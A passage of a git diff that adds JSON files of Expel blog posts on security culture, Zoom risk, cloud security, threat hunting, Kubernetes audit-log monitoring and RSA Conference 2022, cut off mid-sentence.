Cases that illustrate how awareness and behavior won the day can associate strong security practices with satisfaction and accomplishment. Leadership suppor t. Employees are on the receiving end of lots of \u201ccompulsory\u201d communications, and while they know these periodic reminders (legal, compliance, security, etc.) are important, they can quickly tune out as soon as they realize that, oh yeah, we already know this. A good way to bypass the tune-out is to make sure executives address security as a matter of habit outside routine channels. Leaders can use personal communications, company calls, unscheduled emails to reinforce training themes, point to internal successes, praise specific employees for best practice behavior, and the list goes on. The point is to illustrate that leaders aren\u2019t just spouting boilerplate for legal \u201cCYA\u201d reasons. Culture ownership . One popular bit of advice is to assign the job of \u201cculture owner\u201d to a specific person. This is a good idea, especially in an institutional setting, because it elevates the profile of the evangelist and invests this person with the approval of leadership. It\u2019s only an interim step, though. Longer term, and beyond the walls of a single organization, everyone owns the culture. Socializing this message should be the culture \u201cowner\u2019s\u201d primary mission. Core value. Organizations have a set of fundamental principles that guide everything they do. \u201cCustomer focus\u201d is the prime directive for many businesses. Amazon is famous for its \u201cbias for action.\u201d Patagonia pledges to \u201cuse business to protect nature.\u201d At Expel, we take equity, inclusion, and diversity very seriously because we know it\u2019s the foundation for excelling at everything we do. Cybersecurity awareness not only safeguards the business, it promotes continuity and extends a halo of security to your customers, third parties, and communities. It can be an ideal pillar for a more productive value set. Normalize security discussions . Encourage employees to talk about security. Security awareness is routine in a mature cybersecurity culture. Over time, the goal is to replace FUD with a more casual \u201cenlightened paranoia.\u201d Yes, the bad guys are out to get us\u2014because that\u2019s what bad guys do\u2014but we have it under control and we aren\u2019t afraid. (Also, as the topic becomes normalized in the workplace, workers are more likely to take it home with them, helping spread awareness beyond the office.) Cybersecurity safeguards us from a volatile world of risk. But FUD and anxiety aren\u2019t sustainable responses . In her recap of this year\u2019s RSA Conference, Expel CMO Kelly Fiedler explained that \u201chope and encouragement [wins] over fear, uncertainty, and doubt.\u201d In an industry that often relies on FUD\u2026to compel action, the common thread from the keynote speakers was a message of hope. Notable leaders from industry giants (think: RSA, Cisco, and VMware) took to the stage to remind us that if we pull together, we have the power to change the world for the better . As we close out Cybersecurity Awareness Month 2022, let\u2019s sustain the momentum by remembering to see ourselves in cyber . This prescription may seem a little abstract to some, but the emphasis on people \u2014that\u2019s easy to identify with. People are our coworkers, our families, our friends, and our neighbors. The more our culture is driven by awareness instead of checklists, the more energy we have for pursuits that benefit our organizations and the communities we serve and live in. * Yeah, we know. Not everybody is great about all these things. Especially the one about turn signals." +} \ No newline at end of file diff --git a/thinking-about-zoom-and-risk.json b/thinking-about-zoom-and-risk.json new file mode 100644 index 0000000000000000000000000000000000000000..cb8e71be057f01f85f83c9ae3e83827dace7cc10 --- /dev/null +++ b/thinking-about-zoom-and-risk.json @@ -0,0 +1,6 @@ +{ + "title": "Thinking about Zoom and risk", + "url": "https://expel.com/blog/thinking-about-zoom-risk/", + "date": "Apr 21, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG Thinking about Zoom and risk Security operations \u00b7 4 MIN READ \u00b7 BRUCE POTTER \u00b7 APR 21, 2020 \u00b7 TAGS: CISO / Company news / Get technical / Heads up / Managed security Like you, we\u2019ve been paying attention to the news about Zoom. In particular, we\u2019re looking into various security findings and concerns shared on social media and in news outlets. The situation changes by the day, but I want to give you a quick overview of our opinion on all the various security findings and our thoughts on managing risk from using Zoom. First, the TL;DR. We are continuing to use Zoom. We\u2019ve looked at the product, how we use it, the company, and the overall risk to Expel, and we\u2019re comfortable continuing to use it as part of our daily operations. How did we reach this conclusion? Read on. Dealing with third-party risk Stepping back from Zoom for a minute, when it comes to ANY external vendor, you\u2019re constantly balancing the reward of the service they offer with the risk of using that service. All of us (hopefully!) have a third-party risk program to document and guide the third-party risk management process. Not that long ago, managing third-party risk involved taking deep dives on individual products and asking: \u201cis this product suitable for use?\u201d But in a cloud native environment, the assessment has shifted. In a SaaS solution, a company can deploy updates to services without any notification that can dramatically change the product. It\u2019s nearly impossible to do a point in time assessment of their product and have it mean anything. Instead, we are now asking ourselves: \u201cis this company suitable for us to do business with?\u201d Let\u2019s look at Zoom and the company\u2019s actions to date. Zoom created a remote collaboration product with a relatively low learning curve, a common user experience across multiple platforms, and ran it in a reliable way. In 2020, they\u2019ve scaled from an average of 10 million meetings a day in January to 200 million meetings a day in March. They\u2019ve moved many of their engineering resources over to focus on security and privacy issues. Zoom released numerous security updates to both fix vulnerabilities and add new security features. The CEO has been interviewed several times being incredibly frank about their security challenges and indicates security is going to be a big part of Zoom going forward. Zoom also recruited skilled security professionals such as Katie Moussouris (and her company Luta Security) and Alex Stamos to make sure the right things are being done both internally and externally. All in all, Zoom is making all the right decisions and doing the right things to address security concerns and build a more secure product. They\u2019re not burying their heads in the sand and they\u2019re being very transparent. From a third-party risk perspective, Zoom is a company we want to do business with. What about the product? The product clearly still matters. So, let\u2019s take a look at the types of problems that were recently uncovered. Zoombombing. This is when uninvited people join Zoom meetings and cause disruption. It\u2019s a real problem right now. However, it appears to only occur during meetings with publicly accessible meeting IDs. This problem isn\u2019t limited to Zoom, unfortunately. The current spike in video conferencing leads to a spike in disruption as well. On April 15th, Fairfax County in Virginia had to cancel school for three days to develop countermeasures against students and other parties being disruptive using techniques such as racist and homophomic names and memes during distance learning classes. There\u2019s anecdotal evidence of some non-public meetings being Zoombombed but not enough to convince us that it\u2019s a real risk. Zoom quickly implemented countermeasures to dramatically slow the ability to find valid meeting IDs with brute force. Zoom also provided guidance to help run meetings more securely as well as grouped all the security controls under a big \u201csecurity\u201d button that hosts can use to quickly configure security options and maintain control of meetings. It seems that while Zoom can\u2019t control human nature, they\u2019ve put some controls at our fingertips to keep out those who want to disrupt or cause chaos in our meetings. Overall security of the Zoom app. Zoom can run in two ways: inside your browser or as a standalone application. The Zoom application has been getting a lot of attention lately and there have been several low risk vulnerabilities discovered including the ability to send malicious links in chat and to potentially be able to read Windows password hashes remotely. Also, security expert mudge had some choice words on the overall security of the Zoom binaries. In a nutshell, while the findings mudge talks about aren\u2019t security vulnerabilities on their face, they are indicative of a development process that doesn\u2019t have security baked into it. Zoom quickly addressed these issues but there\u2019s likely to be more discoveries in the coming weeks. Looking at Zoom the company, they appear to be taking these concerns to heart and are working to build more secure applications as time goes on. All the attention from both security researchers and malicious users alike will continue to press Zoom to make their core application more secure. Encryption. While Zoom indicated sessions were \u201cend-to-end\u201d encrypted, the actual architecture is end-to-Zoom and Zoom-to-end encrypted. While it\u2019s not ideal from a privacy perspective, Zoom meetings are encrypted on the wire. However, according to a Citizen Lab report even the encryption that\u2019s in place is home-rolled and generally not up to industry standards. While you\u2019re forced to trust Zoom to not intercept and do something malicious with your data, in general the real risk to this kind of communication is interception on the wire. And even if you capture data on the wire, you still have to do work to decrypt it. While weak encryption is never a good thing, in this case attackers have to be a) on the wire and b) motivated enough to perform the cryptanalysis to recover the cleartext data. These types of attackers are few and far between and generally tend to be interested in national security interests, not a meeting of your marketing department. Like everything else listed here, Zoom\u2019s working to address this encryption issue. In a webinar on April 15th, Zoom indicated they\u2019ll be migrating to AES 256 GCM (instead of ECB) in a \u201c matter of weeks \u201d and are working towards full end-to-end encryption. Again, do you trust Zoom on this? Given their transparency to date, we believe that this is really the goal they\u2019re working towards. If they focus the current discussions on end-to-end encryption and law enforcement access, they\u2019ll get to where they\u2019re trying to go. So what? Every day that passes is a day that Zoom is a little more secure than it was the day before. Given the current encryption concerns, it makes sense that certain government agencies have said \u201cno\u201d to Zoom use. But for most corporate applications (and certainly your family and community activities), we believe Zoom is suitable for use. Barring any major changes in Zoom\u2019s security posture, Expel will continue to use Zoom for our business needs. Have any other concerns about using Zoom? Let us know and we\u2019ll do our best to answer your questions." +} \ No newline at end of file diff --git a/this-is-how-you-should-be-thinking-about-cloud-security.json b/this-is-how-you-should-be-thinking-about-cloud-security.json new file mode 100644 index 0000000000000000000000000000000000000000..3d2422a09976d40ce06ee0a4057807b8342a0c9c --- /dev/null +++ b/this-is-how-you-should-be-thinking-about-cloud-security.json @@ -0,0 +1,6 @@ +{ + "title": "This is how you should be thinking about cloud security", + "url": "https://expel.com/blog/how-you-should-think-cloud-security/", + "date": "Jun 20, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG This is how you should be thinking about cloud security Security operations \u00b7 5 MIN READ \u00b7 MATT PETERS AND PETER SILBERMAN \u00b7 JUN 20, 2019 \u00b7 TAGS: CISO / Cloud security / How to / Managed security / Planning You can\u2019t set foot in any conference or read an article in your go-to tech trade without hearing about cloud. And we totally get the fandom. The cloud offers businesses of all shapes and sizes plenty of benefits, with the biggest one being that you can move faster to accomplish a business outcome. Cloud is the perfect example of a technology where you can pour money into it to achieve scale. But how exactly do you \u201cdo security\u201d in the cloud? Your IT team isn\u2019t racking and stacking servers like they used to \u2026 and it\u2019s much harder to see the endpoints you\u2019re now responsible for protecting. But please let us be the bearers of some good news: securing your data in the cloud is much easier to do than you think, as long as you\u2019re thinking about the cloud in the right way. The security challenges of cloud With the cloud comes some fundamental shifts in how companies do business and how IT and security think about tech. Here are the ones you need to care about, because they impact how you need to protect your org\u2019s data. Things move (a lot) faster. Sure, being able to go from nothing to a fully stood-up application in minutes is awesome, but it also puts a new burden on the security team (or your security \u201cperson\u201d if you don\u2019t have a full team). Specifically, traditional change control processes are easily outgunned, which means you don\u2019t have those as an easy way to get visibility into the changes your developers are making since they may no longer need permissions to spin up new databases. You still have visibility in the cloud, but that view is different than what you\u2019re used to. The types of visibility available in the cloud are not always the same \u2014 understanding what telemetry data is available from your cloud provider will help you find commensurate controls. For example, it may not be easy to get full Packet Capture (PCAP) but you can get flow logs from most cloud providers. You\u2019ll probably have a new/different pivot point. When you think about infrastructure, you usually pivot based on hostname, IP and sometimes the user. But in looking at detection and response for cloud applications like Office 365 and G-Suite the logs usually only contain a username. In these cases, the user identity becomes the new thread to follow. (Speaking of Office 365, we\u2019ve got an entire post right here about how to keep Office 365 secure. ) Our simplified 3-part take on cloud security We think about \u2018cloud\u2019 in three distinct parts. Each part corresponds to a pattern we see that implies certain business goals, and brings with it specific complexities and advantages. By understanding which \u2018cloud\u2019 you\u2019re talking about, you\u2019ll have a much better handle on what controls you\u2019ll be able to use effectively to protect your data. Part 1: Infrastructure Then \u2026 In the old world, your infrastructure was contained in a data center. There were physical walls around it with man-traps and guards. The network was similarly segmented, with (usually) well-understood ingress and egress points. Only a few people had permissions to make changes to the physical or logical infrastructure. As a result, concentrating visibility and control in a change control board (CCB) that met infrequently and authorized changes was pretty easy (and effective). Now \u2026 In the new world your data center is, at best, a logical construction. Physical walls are replaced with VPC configuration and your cohort of sys admins with root passwords are now replaced by API access and keys. Given that a team can spin up an entirely new infrastructure overnight with no real controls, it might seem like all hope to regain control and have oversight is lost. But it\u2019s not. With the new world of configuration-driven infrastructure, you\u2019ve got an opportunity to implement a new change control process. Your new process can rely on \u2014 gasp \u2014 automation to review configuration changes against your org\u2019s best practices, conduct vulnerability scanning for new software and enforce security policies before changes are made. Now instead of periodically reviewing a spreadsheet to make sure your controls are still applicable and useful, you can now build controls right into your CI/CD pipeline. This visual from The New Stack is a great representation of how you\u2019re able to build these controls right into a product or service in the development process: Image source Part 2: Cloud apps Then \u2026 Back in the day you delivered software services the old-fashioned way \u2014 you ran those things yourselves! You had a cluster of Microsoft Exchange servers and an Oracle database running your CRM. You had on-call rotations and people who knew the way to the datacenter. Oh, and remember those Friday nights near the end of a quarter when you were frantically swapping out hard drives to get database clusters back online? Also, Limp Bizkit was a thing. Back then, you had all the control in the world to monitor whatever and however you wanted. But the costs were high. You were buying drives, constantly training people, triaging networking failures, dealing with power outages \u2026 all that stuff was your problem. You were optimizing for the cost of running and maintaining critical software with specific controls \u2014 and those controls were really the people who could upgrade and access running servers. You probably also had controls that required employees to physically be in an office to get work done (yeah, I\u2019m talkin\u2019 about pre-VPN days). Now \u2026 Enter SaaS applications . And lots of them. Today, email\u2019s delivered via Office 365 or G-Suite through servers you\u2019ll never see. There\u2019s no physical boundary you can monitor or control, no server to instrument. You\u2019ve gotta rely on built-in application and audit logs to monitor these applications. The good news is that (for the most part) these applications come with excellent application logging built right into them. For example, SalesForce has extensive audit logging built in as a button-click. On top of that, advances in data science have taken user-based anomaly detection from something you read about in academic papers to something that\u2019s now built right into many platforms in SIEM products like Exabeam and Sumo Logic. Sure, there\u2019s a little bit of a learning curve here \u2014 you\u2019ll have to spend some time understanding these new application logs and how to instrument them to monitor for unusual or malicious activity. Even though this new world requires some learning up front, there\u2019s more value for you and your org in the long run, because you\u2019re able to spend time focusing on the security of the application, not on keeping the lights on. Want more specific recommendations on how to get started with protecting your cloud apps? Then you need to read this post: \u201c Three tips for getting started with cloud application security. \u201d Part 3: Custom apps Then \u2026 In the past, rolling out new apps was a long and painful process \u2014 developers spent time testing, sys admins were deploying and then there were bumps in the road. Developers then had to patch in production (\u201cIt\u2019s the last time we\u2019ll do this, I swear!\u201d) and then finally the system worked. Now \u2026 With the cloud, app development and deployment happens much faster \u2014 if developers and the operations team work together to build an environment with the right balance between controls, processes, velocity and automation, that is. Custom applications require that the security and operations team understand the application in order to secure it. If you don\u2019t have a topological control-point like a fixed network egress this can feel daunting, but the same configuration-as-code that makes your developers more effective also let your security team understand the application and monitor changes. The focus in modern DevOps on solid application logging is a good thing because it means that security signals are already built into your custom app when it gets deployed. And most modern deployment pipelines take advantage of configuration checking, image scanning and compliance checking \u2014 and they\u2019re usually (easy) click-to-enable type features. As with infrastructure and SaaS, the promise of infrastructure-as-code and application logging requires a partnership with the development team, as well as some expertise in modern DevOps tool chains (we\u2019re fans of several infrastructure-as-code tools such as Terraform and Ansible ). What now? The cloud has plenty of benefits \u2014 when it comes to security, we just need to re-evaluate the contents of our bag of tricks. Some tried-and-true methods from our \u201crack and stack\u201d days are no longer relevant. But if you approach cloud security from the three vantage points described above, you\u2019ll be well on your way to building a solid security foundation. Have more questions about cloud? Drop us a note . We\u2019d love to chat." +} \ No newline at end of file diff --git a/threat-hunting-build-or-buy.json b/threat-hunting-build-or-buy.json new file mode 100644 index 0000000000000000000000000000000000000000..eecb48df9c0e1a58a9e095258ec992081865b6da --- /dev/null +++ b/threat-hunting-build-or-buy.json @@ -0,0 +1,6 @@ +{ + "title": "Threat hunting: Build or buy?", + "url": "https://expel.com/blog/threat-hunting-build-or-buy/", + "date": "Jan 11, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Threat hunting: Build or buy? Engineering \u00b7 5 MIN READ \u00b7 BRYAN GERALDO \u00b7 JAN 11, 2022 \u00b7 TAGS: Cloud security / MDR / Tech tools Faced with ever-evolving threats in this cyber-fueled world, threat hunting is critically important. But your ability to apply a consistent level of analytic rigor and produce valuable findings while threat hunting relies heavily on your available tech and expertise. Plus, finding the time and space to effectively implement and participate in threat hunting can be difficult. So, what\u2019s the best option \u2013 build your own hunting program or buy a hunting service? In my previous blog post , I explained what hunting is and why it\u2019s important for security practitioners to understand the value it provides to detection and response. In this blog post, I\u2019m going to cover what to consider as you add hunting to your org\u2019s security program (like cost and security team capacity) and your options when you don\u2019t have the resources to build the threat hunting program yourself. A history lesson In the 1950\u2019s, my wife\u2019s grandfather \u2014 Bill McPhee \u2014 created the first computer-based predictive behavioral model to identify patterns of human behavior. According to author Jill Lepore\u2019s 2020 book, If Then, this model may have played a role in helping elect John F. Kennedy Jr. (JFK) to the presidency. How? By identifying patterns of potential voter behavior. It all started with a hypothesis \u2014 can advanced data analysis of historical voting patterns be used to predict or influence election outcomes? To test the hypothesis, a smart group of people used specially designed technology to analyze historical voting data among different voter groups. These groups were assigned by a collection of shared characteristics (religious affiliation, income level, gender, geographic location, etc.). The analysis identified behavioral patterns within these voter groups that helped JFK\u2019s team tailor campaign messaging for those specific audiences. And those audiences ultimately played a major role in his narrow victory. The use of advanced data analysis to confirm or disprove a hypothesis is still as prevalent today as it was then. For example, it\u2019s a key component of threat hunting. A strong hunting program requires 1) an understanding of known attack behaviors 2) awareness of your attack surface (so what is at risk) to inform hypotheses for good hunts; and 3) the right data and expertise to not only ensure that you can remove the signal from the noise, but that you can create good, repeatable paths for analysis. And that analysis with hunting is far more advanced using a combination of code and humans to conduct cross-correlation and frequency analysis to help extend the monitoring of an infrastructure beyond the one-sided view you can expect with detections. You need to maintain your hunting program if you want it to succeed. A good hunting program includes tools and processes that ensure analytic rigor (e.g. repeatable analysis and results), a sound feedback loop for hunts, and a team that stays up-to-date on the latest research and how best to use your security tools. All of this requires human resources, time, and a strategy that allows you to evolve your program as needed. Build? Cost of building a hunting program The hurdle that many orgs have to overcome is whether to buy or build a threat hunting program. And if building, can the program be effectively implemented and managed on an ongoing basis? Let\u2019s take a look at a few cost estimates associated with building a security operations centers (SOCs), closely aligned with similar figures outlined by Ponemon Institute in 2021. SOC-related costs are good indicators of hunting costs because many hunting programs rely on the same tech and staff as the org\u2019s SOC. Typical SOC cost averages: Annual salary for a security analyst: ~ $115,000. Intended annual spend for tools: ~$180,000 \u2013 SIEM ~$340,000 \u2013 Security Orchestration Automation Response (SOAR) ~330,000 \u2013 Extended detection & response (XDR) Spending on security engineering to make it all work. Cost: ~ $2.5 Million per year Also, looking at recent data from a SANS study, we see that most orgs don\u2019t have full-time hunting staff. Just 19 percent of respondents were \u201cworking as full-time threat hunters at their organizations\u201dand 75 percent of orgs were hunting \u201cusing staff that also fulfill other roles within the organization.\u201d To keep things simple, let\u2019s exclude the budget for security engineering. We\u2019ll also assume all of the relevant people and tech are working on threat hunting 25 percent of the time. Check out the total amount in the chart above. Excluding the cost for security engineering, the average cost of a hunting program (at 25 percent of the annual SOC spend) could easily meet or exceed $200,000. This breaks down to approximately $16,000 per month for a hunting program that may not be fully used. Then you need to take into account that those hunting efforts are likely limited to a particular tech platform \u2013 like your endpoint detection and response (EDR) tool and infrastructure like Windows Active Directory (AD). Those hunting efforts would have limited visibility across the whole environment. Does that cost seem reasonable? To us, it only seems reasonable if, for example, you\u2019re able to identify something during every hunt that reduces the dwell time (time spent undetected in the environment) of an attacker. But finding an attacker is never a guarantee. Plus, hunting with limited visibility, experience, or time can yield sub-par results and findings. And since hunting isn\u2019t a full-time effort for many orgs, the struggle to implement, manage, and measure hunting continues. As a result, many orgs find themselves spending a lot of money to build a hunting program that doesn\u2019t provide useful results and is difficult to maintain. \u201cWhen they aren\u2019t focusing on threat hunting, 75% of respondents are focusing on incident response or forensics. Just over half (51%) performed a security architecture/engineering role, and a little over a third (37%) performed system administration functions.\u201d \u201cAlmost half (45%) of respondents run an ad hoc hunting process that is dependent on their needs. That makes it more difficult to have dedicated resources for threat hunting and leads to less consistent results. Also, most respondents measure the success of threat hunting on an ad hoc basis, making it even more difficult to get numbers that justify employing enough dedicated threat hunters.\u201d \u201cBecause threat hunting requires the allocation of budget and resources, measuring the effect it has is important. In last year\u2019s survey, we established that most organizations still struggle to measure threat hunting in a consistent way.\u201d To sum it up: a lot of orgs are making efforts to strengthen their security (at considerable cost) with investments that often include or align with threat hunting. Yet, these same orgs use staff for hunting whose primary responsibilities are tied to other groups (like SOC or Incident Response). Even with a larger focus on hunting, these orgs often have limited time available to dedicate to hunting and limited visibility into their infrastructure. Also, without a good process and tools to capture and track results, it\u2019s hard to measure the impact of these hunting efforts over time. Buy? Value of buying a hunting service So, if your org knows threat hunting is important but doesn\u2019t have the time and resources to dedicate to effective hunting, what\u2019re your options? Is it worth engaging an outside service to augment the efforts you\u2019re already making? Can a hunting partner give you extra coverage and peace of mind? To us, it\u2019s a resounding yes. The best part? You also save money. According to Aite-Novarica Group\u2019s recent Threat Hunting Impact Report , \u201cAdding this service should be an easy decision for clients to make in light of the value provided. For less than the cost of bringing a single threat hunter on staff, organizations can benefit from a fully managed hunting service utilizing highly experienced hunters and an automated hunting platform.\u201d Hunting partners should also give you guidance on how to use hunting strategically and set up measurement frameworks. Here at Expel, we\u2019ve identified ways to track the effectiveness of using our hunting service . For example, when an org implements short-term remediations or long-term operational tools and processes as the result of our hunt findings, we track the outcomes over time. Stay tuned for an upcoming blog discussing one of these tracking tools in more depth \u2013 our resilience recommendations. Ready to learn more? Watch my Fireside chat with ISMG : \u201cThe evolution of threat hunting and why it\u2019s more important now than ever.\u201d" +} \ No newline at end of file diff --git a/three-kubernetes-events-worth-investigating.json b/three-kubernetes-events-worth-investigating.json new file mode 100644 index 0000000000000000000000000000000000000000..17bc5775a1c05a664d1a7ab13c162733db95eef3 --- /dev/null +++ b/three-kubernetes-events-worth-investigating.json @@ -0,0 +1,6 @@ +{ + "title": "Three Kubernetes events worth investigating", + "url": "https://expel.com/blog/three-kubernetes-events-worth-investigating/", + "date": "Oct 24, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Three Kubernetes events worth investigating Security operations \u00b7 3 MIN READ \u00b7 DAN WHALEN \u00b7 OCT 24, 2022 \u00b7 TAGS: Cloud security Monitoring your Kubernetes environment is important \u2014 especially if you\u2019re running production workloads. Let\u2019s say you\u2019ve already done the work of collecting the Kubernetes audit logs\u2026 what\u2019s next? What should you actually be looking for? Here at Expel, we\u2019ve been working on Kubernetes security monitoring for a while and have some insights to share. Whether you run Kubernetes yourself or use a managed provider like GKE, EKS, or AKS, certain events are worth investigating. They might indicate a mistake or, worst-case scenario, you might have an attacker poking around inside your Kubernetes cluster. Successful authorization of an anonymous request Okay, so nobody has Kubernetes clusters with public endpoints anymore, right? \u2026 Right? (Cue awkward silence\u2026) As it turns out, this is still really common. A recent internet scan by Shadowserver found nearly 400,000 publicly accessible Kubernetes API endpoints. We\u2019re not here to name-and-shame, but there are some real reasons you may want a public API endpoint. It\u2019s pretty convenient, for example. But that convenience comes with associated risk. You\u2019ll want to make sure that anonymous access is disabled (or well controlled) to avoid leaking sensitive information about your workloads (or worse, secrets that lead to a larger compromise). Luckily, this is something we can easily detect using the Kubernetes audit log. When API requests are logged, anonymous users are categorized under the \u201csystem:anonymous\u201d group, letting you easily look for any requests that were allowed for that group. Watch for requests for unexpected resource kinds. Quick tip: Some managed providers have default built-in roles that grant anonymous users some very limited permissions (for cluster discovery). Examples include GKE\u2019s system:discovery and system:public-info-viewer roles . Anonymous requests for these default roles might be okay, depending on your risk model. Default service account bound to privileged cluster role Default service accounts are one of the most common ways to escalate privileges in Kubernetes. Unless you explicitly change this behavior, Kubernetes will create and auto-mount default service account credentials into pods as they are created. This isn\u2019t a huge issue if you aren\u2019t using that default service account for anything, as they don\u2019t have any permissions by default. However, if you granted default service account permissions with a role binding, an attacker could use those permissions against you. For this reason, it\u2019s a good idea to look out for the creation of a cluster role binding that maps a default service account to a privileged cluster role. This practice has the unintentional effect of granting cluster-wide permissions to all pods created in the service account\u2019s namespace (except for pods that opt out of the credentials or choose a different service account). In any case, it\u2019s a dangerous practice that usually leads to unnecessary exposure of credentials with API permissions. This is also easy to detect in the Kubernetes audit log. Simply look for the creation or modification of a role binding where the subjects include a default service account and the referenced role is privileged (like view, edit, admin, or cluster-admin). Quick tip: Service account subject names start with \u201csystem:serviceaccount:\u201d and end with \u201c:default.\u201d Pod created with an unusual image It\u2019s a good idea to get a handle on the images running in your cluster. From what we\u2019ve seen of the Kubernetes threat landscape so far, coin mining tends to be a common goal for opportunistic attackers. It isn\u2019t sophisticated, and it\u2019s not a good look if you\u2019re affected. We recommend a deployment model where there\u2019s only one way to deploy images (usually a CI/CD service) rather than allowing users to create pods manually. If you implement this approach, and expect images to only come from your private image repository, it\u2019s a great opportunity to discover pods that don\u2019t follow those rules. Even if you don\u2019t have your deployment process locked down to that degree, there are some images you probably never expect to see in your clusters and are worth examining. Quick tip: Pod images are logged in the format /:. This makes it easy to look out for unexpected repositories or image names. Taking it to the next level The Kubernetes audit log is a great source of high-fidelity security signals. We\u2019ve walked through three ideas to get you started, but there\u2019s a whole world of opportunity to build out security alerting that helps you identify and quickly respond to issues before they become full-on crises. Expel aims to make Kubernetes security accessible to everyone. If you\u2019d like to learn more about how we can help, contact us ." +} \ No newline at end of file diff --git a/three-tips-for-getting-started-with-cloud-application-security.json b/three-tips-for-getting-started-with-cloud-application-security.json new file mode 100644 index 0000000000000000000000000000000000000000..a1e099900d8ac593de27f6c44d73d1c41c6b7d5c --- /dev/null +++ b/three-tips-for-getting-started-with-cloud-application-security.json @@ -0,0 +1,6 @@ +{ + "title": "Three tips for getting started with cloud application security", + "url": "https://expel.com/blog/three-tips-getting-started-cloud-application-security/", + "date": "Jan 22, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG Three tips for getting started with cloud application security Security operations \u00b7 3 MIN READ \u00b7 JUSTIN BAJKO AND PETER SILBERMAN \u00b7 JAN 22, 2019 \u00b7 TAGS: Cloud security / How to / Planning If you\u2019ve been feeling like your SaaS security knowledge is a bit cloudy (heh!), then you\u2019ve come to the right place. Last fall, we shared some initial thoughts on how to get a grip on your cloud security strategy. But we continue to hear more cloud-related questions from our customers, particularly when it comes to cloud application security. For example, these three come up week after week: Who\u2019s really responsible for protecting what? How do I actually get started? Where should I start? What types of things should I be looking for, and where? And how? Here\u2019s our two cents. First things first: Who\u2019s responsible for protecting what? This is the million-dollar question: When you move to the cloud, who\u2019s responsible for protecting what? When it comes to security, you\u2019ve got to think about your cloud infrastructure (the systems and workloads you\u2019re running in AWS, Microsoft Azure or Google) and your cloud applications (Office 365, Salesforce, Workday, etc.) as two separate things because each of them comes with different types of security risks and requires different investigation techniques. (By the way, we\u2019ve got an entire post filled with Office 365 security best practices for you, which is right here. ) And while, in the case of SaaS applications, the security of the infrastructure is the responsibility of your cloud service provider, the security of your data that lives in your cloud applications and the user accounts allowed to access those applications are your responsibility. Sure, you\u2019re probably using all of those convenient SaaS applications so you don\u2019t have to maintain the physical hardware and networks they run on, but it\u2019s still your data, so it\u2019s your responsibility to know who\u2019s accessing it and whether that access is authorized. #jobsecurity Monitoring SaaS applications is a different ballgame because you\u2019re not looking for malware on a laptop anymore. Devices are no longer your endpoints \u2013 your users are. Monitoring a SaaS environment is about understanding user behavior and that starts with understanding the signals your SaaS provider is sending you and verifying that they\u2019re properly configured. What are the must-dos when it comes to protecting SaaS applications? We could answer this question with an entire scroll of to-dos (this is one of our favorite topics, ya know), but three seems like a manageable number. So, here are the three most important things you can do if you\u2019re just getting started with cloud application security. Identify all of your cloud applications. Sounds simple, but trust us \u2014 it\u2019s not. There are probably at least a couple (dozen?) SaaS apps running in your environment that you don\u2019t know about. Time to take inventory. There are a bunch of ways to get started. For example, if you\u2019ve got one of the firewalls or intrusion detection system (IDS) products that inspects traffic, it can give you a report of the cloud applications people are using in your environment. You can also use a cloud access security broker (CASB) to shine a light on the applications being used, and begin to enforce some policies about their use. Once you\u2019ve got that list you can use it to audit the different contracts and services that each department has subscribed to within your org. Gather the log data from these applications. Once you gather the log data from each app, store it in a place where it\u2019s easy to search, so you can write detections based on certain conditions. What should you be looking for, exactly? Watch for common signs of compromise, like logins coming from a VPN provider, a burst of document sharing activity or application-specific signs of misuse and compromise like an email rule that\u2019s created to forward emails to an inbox outside the corporate domain (just to name a few). Focus on the users. Say it with me: \u201cUsers are the new endpoints.\u201d Here at Expel, our cloud application detections fall into about five classes of detections, all of which \u2013 you guessed it \u2013 examine user behavior. Each class has specific detections for a given application \u2013 like authentication, email management and resource management. What are some common detections that would require us to alert a customer and perform further investigation, you ask? One example is finding a user who is authenticating from a VPN service provider. This isn\u2019t necessarily a smoking gun, but it\u2019s uncommon enough that we\u2019d want to look more deeply into that user\u2019s activity to see if anything else they\u2019re doing looks fishy. Another example is a user configuring an inbox rule that auto-forwards all their corporate email to a Yahoo account (or really any external email). Another anomaly we detect is when a user anonymously shares a lot of documents in a short period of time. We alert our customers about user behaviors that present potential risks to their data, and then partner with their security teams to investigate and respond to those threats. Putting it into practice We\u2019ve already seen success with our customers in helping them better understand what\u2019s happening with their data in some of these cloud applications. We\u2019ve been able to create detections that are specific to their applications (and even their users) \u2013 all of which give us and our customers better signals that help us understand quickly and accurately if there\u2019s a security risk. So \u2026 if you\u2019re looking for a place to start your cloud application security journey, these three straightforward tips are a good jumping off point. And if you need help or have questions, we\u2019ll be here \u2013 drop us a note." +} \ No newline at end of file diff --git a/top-3-takeaways-from-rsa-conference-2022.json b/top-3-takeaways-from-rsa-conference-2022.json new file mode 100644 index 0000000000000000000000000000000000000000..46a0da4ed5a1d460cb17e1ed1ec372e8b54b62db --- /dev/null +++ b/top-3-takeaways-from-rsa-conference-2022.json @@ -0,0 +1,6 @@ +{ + "title": "Top 3 takeaways from RSA Conference 2022", + "url": "https://expel.com/blog/top-3-takeaways-from-rsa-conference-2022/", + "date": "Jun 16, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Top 3 takeaways from RSA Conference 2022 Expel insider \u00b7 3 MIN READ \u00b7 KELLY FIEDLER \u00b7 JUN 16, 2022 \u00b7 TAGS: Cloud security / Company news / MDR / Tech tools That\u2019s a wrap on RSA Conference 2022, and we\u2019re still dazed from the four days we spent on the show floor. For many of us, it was the first major in-person conference since the onset of the pandemic, and our time back at Moscone was both exciting and familiar. The Expel booth buzzed with friends old and new as we made our exhibitor debut. To kick things off, we popped champagne and heard from our founders about how Expel came to be. Then, through demos and conversations, we got to share our approach to security and show you why we think it can even be delightful. Harry Mack brought down the house with a series of improvisational freestyle rap performances that had folks dancing in the aisle. We attended sessions and made connections with industry colleagues from around the world. And our friendly bots, Josie\u2122 and Ruxie\u2122, even made an appearance ! Now that we\u2019ve had time to reflect on this year\u2019s conference, here are three of the big takeaways and highlights from our time at Moscone. Hope and encouragement won over fear, uncertainty, and doubt. In an industry that often relies on FUD (fear, uncertainty, and doubt) to compel action, the common thread from the keynote speakers was a message of hope. Notable leaders from industry giants (think: RSA, Cisco, and VMware) took to the stage to remind us that if we pull together, we have the power to change the world for the better. Speakers took lessons learned from recent history to lay out trends they\u2019re seeing across their customer bases, and we all left sessions feeling encouraged. Cybersecurity is for everyone. The only way to stay 